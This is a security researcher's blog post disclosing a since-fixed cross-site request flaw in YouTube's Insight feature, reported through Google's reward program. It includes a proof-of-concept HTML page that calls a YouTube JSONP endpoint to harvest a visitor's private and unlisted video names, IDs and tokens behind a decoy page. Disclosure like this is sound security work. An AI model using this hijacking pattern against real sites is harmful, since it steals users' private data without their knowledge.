Entries from Ianuarie 2011 ↓

Google Security Issue #1: Youtube CSRF Attack

Some of you may know that Google has started this vulnerability reward program. This is the first post in a series of 5 6 7 8 (so far) about the security issues discovered by me and submitted to Google for this program. The issue is fixed now, so don’t try too hard to reproduce it.

And if you want to see who found security issue in Google sites, have a look here  http://www.google.com/corporate/halloffame.html. You might even find me there. 😉

What I found in Youtube is an issue that compromises the Insight section. What could Theevilone do:

  • Get all Insight information for a user’s video.
  • Get name of private videos.
  • Get URL’s of unlisted videos.

This is the actual e-mail sent to Google with the technical details.

It starts with this call:
http://www.youtube.com/insight_titles?first=0&max=500&callback=__jsonp__.I4.onSuccess
that can be included in a page like this:

<html>
<head>
<script>
function showData(data) {
// do evil stuff with the data
}
//__jsonp__ = {I4 : {onSuccess : showData}};
</script>
<script src=”http://www.youtube.com/insight_titles?first=0&max=500&callback=showData“></script>
</head>
<body>
<!– fake interesting page–>
</body>
</html>

The data that you get is the video name, video id and video token for all the videos of the user (public or private). Using the video token you can make then subsequent call to get more info about the video like Views, Demographics etc. You just need the video token that you got from the first call.

Share